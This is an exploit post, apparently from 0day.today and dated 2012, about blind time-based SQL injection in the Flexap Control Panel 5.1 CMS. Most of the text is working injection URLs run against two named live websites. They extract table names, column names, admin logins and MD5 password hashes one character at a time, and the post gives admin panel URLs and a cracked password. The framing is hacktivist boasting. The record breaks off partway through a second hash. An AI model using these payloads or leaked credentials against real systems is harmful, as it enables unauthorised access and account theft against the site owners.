Flexap Control Panel 5.1 Blind SQL Injection Vulnerability

Date: 04 Sep 2012 00:00:00 | Reported by: AkaStep | Type: zdt | Source: 0day.today

Control Panel version 5.1 Blind SQL Injection Vulnerability in flexap.a

Code
=====================================================
Vulnerable software: Control Panel version 5.1 
Vendor: http://www.flexap.am/
Vuln type: Blind SQL Injection
Software License: Commercial
Software: Control Panel version 5.1 
Discovered and Exploited in Wild
=====================================================
Dork: Developed by flexap.am

=====================================================


************** FOR OUR BRO RAMIL SEFEROV! ************************
@OPERATION BY AZERBAIJAN BLACK HATZ: *WIPEN'EM purgens!*
I'M=> AkaStep<= RESPONSIBLE FOR EVERYTHING IN THIS advisory=
********************** REALLY! ********************************************
******************ENJOY MAXIMALLY**************************************



=====================================================




http://dua.am/cms <=Admin panel

Real exploitation example:

Time Based Always RuleZ!

//TRUE

http://www.dua.am/am/news/50'or sleep(10)-- and 5='5/

cms: http://www.dua.am/



//TRUE

www.dua.am/am/news/50' or (select if(substr(column_name,1,13)='ulist_login',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 3,1)-- AnD  5='5




Let's extract the login:


http://www.dua.am/am/news/50%27%20or%20%28select%20if%28substr%28%60ulist_login%60,1,1%29=%27a%27,sleep%281%29,0%29%20from%20ulist%20limit%201%29--%20AnD%20%205=%275

1st character:


a

//TRUE
http://www.dua.am/am/news/50' or (select if(substr(`ulist_login`,1,1)='a',sleep(1),0) from ulist limit 1)-- AnD  5='5

 
 
2nd character: d
 
 http://www.dua.am/am/news/50' or (select if(substr(`ulist_login`,2,1)='d',sleep(1),0) from ulist limit 1)-- AnD  5='5
 
 
3rd character: m
 
 http://www.dua.am/am/news/50' or (select if(substr(`ulist_login`,3,1)='m',sleep(1),0) from ulist limit 1)-- AnD  5='5
 
 
4th character: d
 
 
 http://www.dua.am/am/news/50' or (select if(substr(`ulist_login`,4,1)='d',sleep(1),0) from ulist limit 1)-- AnD  5='5
 
 
 
5th character: u
 
 
 http://www.dua.am/am/news/50' or (select if(substr(`ulist_login`,5,1)='u',sleep(1),0) from ulist limit 1)-- AnD  5='5
 
 
6th character: a
 
 
 http://www.dua.am/am/news/50' or (select if(substr(`ulist_login`,6,1)='a',sleep(1),0) from ulist limit 1)-- AnD  5='5
 
 
 Login:  admdua
 
 
 //TRUE
 http://www.dua.am/am/news/50' or (select if(substr(`ulist_login`,1,15)='admdua',sleep(1),0) from ulist limit 1)-- AnD  5='5
 
 
 
 
On to extracting the password!
 
 
 
Looks like this is the password :D
 http://www.dua.am/am/news/50' or (select if(substr(`ulist_password`,1,33)='9578f5aa427b07bdd3a8549f929a4e31',sleep(1),0) from ulist limit 1)-- AnD  5='5
 
 
 pass: Massword
 
 
 mogin:Massword

===================================================================

Next another Demo:


Admin panel: http://mkuzak.am/cms/


//TRUE
http://www.mkuzak.am/am/news/85%27%20or%20sleep%2810%29--%20and%205=%275/



//TRUE
http://www.mkuzak.am/am/news-8%27%20or%20sleep%281%29--%20and%205=%275/



Developed by <a href="http://www.flexap.am"


It should be like this:




http://www.mkuzak.am/am/news/1' or (select if(count(table_name)='10',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61)-- AnD  5='5


We have 24 tables:

//TRUE
http://www.mkuzak.am/am/news/1' or (select if(count(table_name)='24',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61)-- AnD  5='5


The 1st table's name is 8 characters long:


//TRUE

Let's extract it


1st letter of the 1st table's name: c


//TRUE

http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,1,1)='c',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 1)-- AnD  5='5


2nd character (of the 1st table's name): a


http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,2,1)='a',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 1)-- AnD  5='5

3rd character: t

//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,3,1)='t',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 1)-- AnD  5='5



Category?

Let's check:

1st table's name: category
//TRUE

http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,1,12)='category',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 1)-- AnD  5='5



OK, now let's try to shorten the method:

Searching by the patterns: adm, user



http://www.mkuzak.am/am/news/1' or (select if(length(table_name)>'10',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 2,1)-- AnD  5='5


http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,1,3)='adm',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 1)-- AnD  5='5



For adm, the results at every LIMIT offset are all FALSE

That leaves user. Edit: for user the result is also false on every attempt.


Let's search for cms.


(select if(substr(table_name,1,3)='acms',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 2,1)-- AnD  5='5


If this doesn't work, the job will take longer.




And so the job did drag on, damn it!



2nd table name: 6 characters long:



http://www.mkuzak.am/am/news/1' or (select if(length(table_name)='6',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 2,1)-- AnD  5='5


Let's extract this damn one too.


1st character: c

//TRUE

http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,1,1)='c',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 2,1)-- AnD  5='5

2nd character: o

//TRUE

http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,2,1)='o',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 2,1)-- AnD  5='5


config?

2nd table name is config:

//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,1,8)='config',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 2,1)-- AnD  5='5



=======================================================================
3rd table name: 3 characters:

//TRUE
http://www.mkuzak.am/am/news/1' or (select if(length(table_name)='3',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 3,1)-- AnD  5='5

1st character: f


//TRUE


http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,1,1)='f',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 3,1)-- AnD  5='5



2nd character: a


http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,2,1)='a',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 3,1)-- AnD  5='5


3rd character: q

//TRUE


http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,3,1)='q',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 3,1)-- AnD  5='5


3rd table name: faq

======================================================================


4th table name: 15 characters long:




http://www.mkuzak.am/am/news/1' or (select if(length(table_name)='15',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 4,1)-- AnD  5='5


1st character: f

http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,1,1)='f',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 4,1)-- AnD  5='5

2nd character:


a

//TRUE

http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,2,1)='a',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 4,1)-- AnD  5='5


this table is going to be a pain
=======================================================================


//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,1,1)='u',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 23,1)-- AnD  5='5

It returns something for the letter u.


It is 10 characters long:


//TRUE


http://www.mkuzak.am/am/news/1' or (select if(length(table_name)='10',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 23,1)-- AnD  5='5


1st character: u

2nd character: l
//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,2,1)='l',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 23,1)-- AnD  5='5

3rd character: i

//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,3,1)='i',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 23,1)-- AnD  5='5

4th character: s

s

http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,4,1)='s',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 23,1)-- AnD  5='5


5th character: t

http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,5,1)='t',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 23,1)-- AnD  5='5

6th character: _

http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,6,1)='_',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 23,1)-- AnD  5='5

7th character: t

http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,7,1)='t',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 23,1)-- AnD  5='5


8th character: y

//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,8,1)='y',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 23,1)-- AnD  5='5

9th character: p

//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,9,1)='p',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 23,1)-- AnD  5='5

10th character:

table_name:  ulist_type

===================================================================================================================
Next table:
//TRUE

http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,1,1)='u',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 22,1)-- AnD  5='5

This one too
//TRUE


http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,1,1)='u',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 21,1)-- AnD  5='5



This one too

//TRUE

http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,1,1)='u',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 20,1)-- AnD  5='5


This one too

//TRUE

http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,1,1)='u',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 19,1)-- AnD  5='5



============================= First letter is u and it consists of 5 characters in total. Maybe users? ======================

//TRUE
http://www.mkuzak.am/am/news/1' or (select if(length(table_name)='5',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 19,1)-- AnD  5='5


2nd letter: l

http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,2,1)='l',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 19,1)-- AnD  5='5

//TRUE

http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,1,6)='ulist',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 19,1)-- AnD  5='5


TABLE_NAME ulist

0x756C697374




http://www.mkuzak.am/am/news/1' or (select if(count(*)='1',sleep(1),0) from ulist)-- AnD  5='5



//TRUE

http://www.mkuzak.am/am/news/1' or (select if(count(*)='2',sleep(1),0) from ulist)-- AnD  5='5

Maybe this is the table used for logging in to the CMS admin panel.
It has 2 records.

Let's look at its columns and see what the situation is.



http://www.mkuzak.am/am/news/1' or (select if(count(column_name)='1',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374)-- AnD  5='5

The ulist table has 8 columns:

//TRUE

http://www.mkuzak.am/am/news/1' or (select if(count(column_name)='8',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374)-- AnD  5='5

1st column name: consists of 8 characters

//TRUE

http://www.mkuzak.am/am/news/1' or (select if(length(column_name)='8',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 1)-- AnD  5='5

1st character of the 1st column name in the ulist table: u

//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,1,1)='u',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 1)-- AnD  5='5

2nd character: l

http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,2,1)='l',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 1)-- AnD  5='5


3rd character: i


http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,3,1)='i',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 1)-- AnD  5='5


4th character: s

http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,4,1)='s',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 1)-- AnD  5='5

5th character: t

http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,5,1)='t',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 1)-- AnD  5='5

6th character: _


http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,6,1)='_',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 1)-- AnD  5='5


1st column name in full:

ulist_id
//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,1,12)='ulist_id',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 1)-- AnD  5='5


So the column prefix is ulist_ :


//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,1,6)='ulist_',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 1,1)-- AnD  5='5


On to extracting this damn 2nd column:

Name length is 13 characters:


//TRUE

http://www.mkuzak.am/am/news/1' or (select if(length(column_name)='13',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 1,1)-- AnD  5='5



http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,7,1)='t',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 1,1)-- AnD  5='5


Currently it looks like this:

ulist_t



//TRUE


http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,8,1)='y',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 1,1)-- AnD  5='5

Currently it looks like this:

ulist_typeXXX


I'm not going to the end; imho to hell with this column name

Next column, damn :(



============================================

3rd column:

Name length is 10 characters
http://www.mkuzak.am/am/news/1' or (select if(length(column_name)='10',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 2,1)-- AnD  5='5



//TRUE


http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,7,1)='n',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 2,1)-- AnD  5='5

ulist_n



//TRUE

http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,8,1)='a',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 2,1)-- AnD  5='5

ulist_na



//TRUE

http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,9,1)='m',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 2,1)-- AnD  5='5

ulist_nam






http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,10,1)='e',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 2,1)-- AnD  5='5


ulist_name


//TRUE


http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,1,11)='ulist_name',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 2,1)-- AnD  5='5


==============================================================


Next column:

Column name length is 11 characters

//TRUE

http://www.mkuzak.am/am/news/1' or (select if(length(column_name)='11',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 3,1)-- AnD  5='5


Prefix: ulist_ (-6)

The offset in substr() must start from 7


//TRUE

http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,1,13)='ulist_login',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 3,1)-- AnD  5='5

ulist_login



If password shows up too, we could get started, damn :(



Looks like I've got this one right already:


http://www.mkuzak.am/am/news/1' or (select if(length(column_name)='14',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 4,1)-- AnD  5='5

Yeah!

Nailed it!

//TRUE

http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,1,15)='ulist_password',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 4,1)-- AnD  5='5


ulist_password


What we have:

the ulist table

in that table:

ulist_login
ulist_password

columns


Let's begin...




http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_login`,1,15)='admin',sleep(1),0) from ulist limit 1)-- AnD  5='5



select length(`ulist_login`) from ulist limit 1


The 1st login name consists of 9 characters:

//TRUE
http://www.mkuzak.am/am/news/1' or (select if(length(`ulist_login`)='9',sleep(1),0) from ulist limit 1)-- AnD  5='5


--------------------------------------------------------------------------------------------------------------------------------------------------------------
1st character of the login: a

//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_login`,1,1)='a',sleep(1),0) from ulist limit 1)-- AnD  5='5



2nd character: d

//TRUE

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_login`,2,1)='d',sleep(1),0) from ulist limit 1)-- AnD  5='5

3rd character: m

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_login`,3,1)='m',sleep(1),0) from ulist limit 1)-- AnD  5='5

4th character: m

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_login`,4,1)='m',sleep(1),0) from ulist limit 1)-- AnD  5='5

5th character:


The login could be this: admmkuzak


//TRUE


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_login`,1,11)='admmkuzak',sleep(1),0) from ulist limit 1)-- AnD  5='5





On to pulling the password...


But first let's check the encryption algorithm.

http://www.mkuzak.am/am/news/1' or (select if(length(`ulist_password`)='32',sleep(1),0) from ulist limit 1)-- AnD  5='5


//TRUE


MD5 ENCRYPTION ALGORITHM:

http://www.mkuzak.am/am/news/1' or (select if(length(`ulist_password`)='32',sleep(1),0) from ulist limit 1)-- AnD  5='5




http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,1,1)='0',sleep(1),0) from ulist limit 1)-- AnD  5='5




Password of the user named admmkuzak:


================================================

1st character: 9


//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,1,1)='9',sleep(1),0) from ulist limit 1)-- AnD  5='5

================================================

2nd character: 5


//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,2,1)='5',sleep(1),0) from ulist limit 1)-- AnD  5='5


================================================

3rd character: 7


//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,3,1)='7',sleep(1),0) from ulist limit 1)-- AnD  5='5


================================================

4th character: 8

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,4,1)='8',sleep(1),0) from ulist limit 1)-- AnD  5='5


================================================

5th character: f

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,5,1)='f',sleep(1),0) from ulist limit 1)-- AnD  5='5



================================================

6th character: 5


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,6,1)='5',sleep(1),0) from ulist limit 1)-- AnD  5='5


================================================

7th character: a

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,7,1)='a',sleep(1),0) from ulist limit 1)-- AnD  5='5


================================================


8th character: a

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,8,1)='a',sleep(1),0) from ulist limit 1)-- AnD  5='5




================================================

9th character: 4


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,9,1)='4',sleep(1),0) from ulist limit 1)-- AnD  5='5



================================================

10th character: 2

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,10,1)='2',sleep(1),0) from ulist limit 1)-- AnD  5='5


================================================

11th character: 7

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,11,1)='7',sleep(1),0) from ulist limit 1)-- AnD  5='5

================================================

12th character: b (check later)

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,12,1)='b',sleep(1),0) from ulist limit 1)-- AnD  5='5




================================================

13th character: 0

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,13,1)='0',sleep(1),0) from ulist limit 1)-- AnD  5='5

================================================

14th character: 7

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,14,1)='7',sleep(1),0) from ulist limit 1)-- AnD  5='5


================================================

15th character: b (check later)


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,15,1)='b',sleep(1),0) from ulist limit 1)-- AnD  5='5


================================================

16th character: d

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,16,1)='d',sleep(1),0) from ulist limit 1)-- AnD  5='5


================================================


17th character: d


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,17,1)='d',sleep(1),0) from ulist limit 1)-- AnD  5='5


================================================


18th character: 3


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,18,1)='3',sleep(1),0) from ulist limit 1)-- AnD  5='5

================================================


19th character: a


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,19,1)='a',sleep(1),0) from ulist limit 1)-- AnD  5='5

================================================


20th character: 8

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,20,1)='8',sleep(1),0) from ulist limit 1)-- AnD  5='5


================================================

21st character: 5

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,21,1)='5',sleep(1),0) from ulist limit 1)-- AnD  5='5



================================================
check later
22nd character: 4

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,22,1)='4',sleep(1),0) from ulist limit 1)-- AnD  5='5

================================================


23rd character: 9

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,23,1)='9',sleep(1),0) from ulist limit 1)-- AnD  5='5


================================================
check later


24th character: f

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,24,1)='f',sleep(1),0) from ulist limit 1)-- AnD  5='5


================================================

25th character: 9


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,25,1)='9',sleep(1),0) from ulist limit 1)-- AnD  5='5


================================================


26th character: 2

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,26,1)='2',sleep(1),0) from ulist limit 1)-- AnD  5='5

================================================

27th character: 9


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,27,1)='9',sleep(1),0) from ulist limit 1)-- AnD  5='5

================================================
check later
28th character: a


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,28,1)='a',sleep(1),0) from ulist limit 1)-- AnD  5='5

================================================

29th character: 4

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,29,1)='4',sleep(1),0) from ulist limit 1)-- AnD  5='5


================================================

30th character: e

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,30,1)='e',sleep(1),0) from ulist limit 1)-- AnD  5='5

================================================


31st character: 3


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,31,1)='3',sleep(1),0) from ulist limit 1)-- AnD  5='5



================================================

32nd character: 1


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,32,1)='1',sleep(1),0) from ulist limit 1)-- AnD  5='5


================================================
Login:  admmkuzak

MD5 HASH:   9578f5aa427b07bdd3a8549f929a4e31


PASS: Massword
Let's check the hash:

//TRUE


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,1,33)='9578f5aa427b07bdd3a8549f929a4e31',sleep(1),0) from ulist limit 1)-- AnD  5='5


Damn, http://www.mkuzak.am/cms/ says the password is wrong :(


Maybe this user has no role?


There should be a 2nd user in this table too.


No other option, let's extract it :*(




For the second user name:


http://www.mkuzak.am/am/news/1' or (select if(length(`ulist_login`)='5',sleep(1),0) from ulist limit 1,1)-- AnD  5='5




1st letter of the 2nd user's login:


m

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_login`,1,1)='m',sleep(1),0) from ulist limit 1,1)-- AnD  5='5


2nd letter: o


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_login`,2,1)='o',sleep(1),0) from ulist limit 1,1)-- AnD  5='5


3rd letter: g

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_login`,3,1)='g',sleep(1),0) from ulist limit 1,1)-- AnD  5='5


4th letter: i


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_login`,4,1)='i',sleep(1),0) from ulist limit 1,1)-- AnD  5='5



5th character: n



http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_login`,5,1)='n',sleep(1),0) from ulist limit 1,1)-- AnD  5='5



Full username for the second user:


mogin

Shall we check?


//TRUE


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_login`,1,6)='mogin',sleep(1),0) from ulist limit 1,1)-- AnD  5='5




On to extracting the password again, damn :*(


================================================

1st character: e


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,1,1)='e',sleep(1),0) from ulist limit 1,1)-- AnD  5='5


================================================

2nd character: 7


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,2,1)='7',sleep(1),0) from ulist limit 1,1)-- AnD  5='5



================================================
check later:
3rd character: 9



http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,3,1)='9',sleep(1),0) from ulist limit 1,1)-- AnD  5='5



================================================

4th character: d


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,4,1)='d',sleep(1),0) from ulist limit 1,1)-- AnD  5='5



================================================

5th character: 2

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,5,1)='2',sleep(1),0) from ulist limit 1,1)-- AnD  5='5



================================================


definitely check
6th character: f

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,6,1)='f',sleep(1),0) from ulist limit 1,1)-- AnD  5='5



================================================





7th character: 3

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,7,1)='3',sleep(1),0) from ulist limit 1,1)-- AnD  5='5





================================================
check later

8th character: 1

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,8,1)='1',sleep(1),0) from ulist limit 1,1)-- AnD  5='5




================================================


9th character: 5


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,9,1)='5',sleep(1),0) from ulist limit 1,1)-- AnD  5='5


================================================
10th character: e


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,10,1)='e',sleep(1),0) from ulist limit 1,1)-- AnD  5='5


================================================

11th character: 9

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,11,1)='9',sleep(1),0) from ulist limit 1,1)-- AnD  5='5


================================================

12th character: 9

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,12,1)='9',sleep(1),0) from ulist limit 1,1)-- AnD  5='5



================================================

13th character: c

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,13,1)='c',sleep(1),0) from ulist limit 1,1)-- AnD  5='5



================================================

14th character: a


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,14,1)='a',sleep(1),0) from ulist limit 1,1)-- AnD  5='5


================================================

15th character: c

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,15,1)='c',sleep(1),0) from ulist limit 1,1)-- AnD  5='5

================================================

16th character: 9


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,16,1)='9',sleep(1),0) from ulist limit 1,1)-- AnD  5='5


================================================

17th character: 0

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,17,1)='0',sleep(1),0) from ulist limit 1,1)-- AnD  5='5



================================================

18th character: 0


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,18,1)='0',sleep(1),0) from ulist limit 1,1)-- AnD  5='5

================================================

19th character: 9

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,19,1)='9',sleep(1),0) from ulist limit 1,1)-- AnD  5='5




================================================

20th character: f

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,20,1)='f',sleep(1),0) from ulist limit 1,1)-- AnD  5='5



================================================

21st character: e


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,21,1)='e',sleep(1),0) from ulist limit 1,1)-- AnD  5='5



================================================

22nd character: 3

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,22,1)='3',sleep(1),0) from ulist limit 1,1)-- AnD  5='5

================================================


23rd character: 6

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,23,1)='6',sleep(1),0) from ulist limit 1,1)-- AnD  5='5


================================================

24th character: e

